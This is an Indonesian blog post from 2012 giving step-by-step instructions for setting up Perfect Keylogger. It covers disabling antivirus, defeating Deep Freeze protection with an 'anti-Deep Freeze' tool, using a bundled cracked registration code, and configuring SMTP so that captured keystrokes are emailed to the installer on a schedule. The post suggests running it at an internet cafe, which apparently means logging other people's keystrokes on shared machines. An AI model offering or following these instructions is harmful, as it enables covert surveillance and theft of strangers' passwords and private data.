Rabu, 06 Juni 2012

Perfect keyloger send email




     ''nih gan, keyloger yg mantap n 100% work,
namanya PK (singkat dari Perfectkeyloger)
cara kerjanya unik lo gan,

ni PK bisa kirimin data-data  ke alamat e-mail kita..
n waktu pengiriman data-data nya juga bisa kita seting....
wkwkwk unik kan?!

kebanyakan keyloger itu diangap bervirus, jadi buat agan yg mao testing
ane kasih tau aja, mending testingnya di warnet,
biar kompi kita kga rusak...wkwkwk

Oiya, sebelum download ni PK, agan harus disable anti virus yg ada..
kalo ngak. ya ga bisa di download or DC..

 kalo agan dah download PK. jngn langsung di instal...
pasang dulu ADF (antideepfreeze)
lumpuhin dulu Deep Freeze, biar nantinya PK bisa kirim data-data ke e-mail agan.

*kalo agan mau ADF nya, liat postingan ane yg dah lewat..
atau baca tutorialnya n download ADF nya klik disini

Oiya biasanya, kalo ADF dah aktif, kompi pasti restar otomatis,
nah kalo dah gitu.
baru dah agan instal PK nya

==langsung aja kita liat cara-caranya===
download dulu PKnya klik disini

kalo udah di instal PK(perfact keyloger)nya...
ikuti langkah-langkah setingan PK dibawah ini,..


gambar di atas adalah setingan pertama,.. nantinya agan bakalan disuruh masukin
username n code registrasi...
*codenya udah ane masukin ke file rar yang agan download,
or agan juga bisa liat(zoom) gambar di atas, sama aja kok codenya


nah, kalo gambar yg di atas ini.. adalah setingan buat hotkey..
contoh: misal kita, mau liat Deep freeze di kompi, teken aja shift+ctrl+alt+F6
nah, yg ini juga fungsinya kayak gitu.. hotkey bisa agan ganti sesuka hati..
*hotkey bawaan pabriknya ctrl+alt+L






kalo yg ini, gambar setingan e-mail, biar keyloger bisa ngirm data-data lewat e-mail,
ikuti contoh dibawah ini:
*send to: isi (masukin e-mail agan)
*smtp server: smtp.mail.yahoo.com
*port number: 25
*user name: (isi ama e-mail agan lagi)
*pasword: (masukin pasword e-mail agan)
Nah, kalo udah di isi semua.... klik send test .

kalo agan ngisi data nya bener. bakalan keluar tulisan kayak gini

nah, sekarang cek e-mail agan.. pasti ada pesan testing adari keyloger yg agan instal,
itu tandanya keylog dah bisa kirim e-mail ke agan.


kalo gambar yg dibawah ini, setingan buat nentuin, setiap berapa menit/jam
keyloger kirim data ke e-mail agan. 
*caranya:
klik delivery di menu e-mail
lalu centang tulisan Try to send logs by e-mail every  [...] hours [....]minutes






nah, kotak kosong hours n minuts itu yg nentuin
tiap jam/menit data dikirim...
*isi terserah agan

0 komentar:

Poskan Komentar

◄ Posting Baru Posting Lama ►

Pengikut

 
Close .: Baca Juga Yang Ini :.
www.blogpingtool.com

Copyright © 2013. Frozenyuan - All Rights Reserved B-Seo Versi 5 by Blog Bamz